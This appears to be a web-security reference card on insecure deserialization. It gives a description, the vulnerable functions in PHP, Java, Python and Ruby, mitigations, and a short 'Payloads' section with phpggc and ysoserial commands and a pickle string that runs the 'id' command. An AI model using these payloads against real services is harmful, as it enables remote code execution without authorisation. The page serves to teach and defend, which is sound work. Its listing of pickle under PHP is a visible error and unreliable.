Home / Web Security / Insecure Deserialization
Critical Severity | OWASP A08:2021

🔴 Insecure Deserialization

CWECWE-502: Deserialization
OWASPA08:2021 Software Integrity Failures
CVSS 3.110.0 (Critical)

🧠 Description

Insecure deserialization occurs when application deserializes untrusted data without proper validation. Attackers can exploit this to execute malicious code (Gadget Chains) or denial of service attacks.

Impact:
  • Remote Code Execution
  • Authentication bypass
  • Denial of Service

🎯 Attack Surface

  • ✅ PHP: unserialize(), pickle
  • ✅ Java: readObject(), ObjectInputStream
  • ✅ Python: pickle.loads, yaml.load
  • ✅ Ruby: Marshal.load

💣 Payloads

PHP (phpggc)
phpggc -o /dev/stdout gimme/webshell system "id"
Java (ysoserial)
java -jar ysoserial.jar CommonsCollections1 "id"
Python
pickle.loads(b"cos\nsystem\nS'id'\ntR.")

🛡️ Mitigation

✅ Don't deserialize untrusted data

✅ Use digital signatures

✅ Implement integrity checks

✅ Use JSON over serialized formats

🛠️ Tools

  • phpggc - PHP gadget chain generator
  • ysoserial - Java deserialization exploit
  • ysoserial.net - .NET deserialization

📚 References

Back to Web Security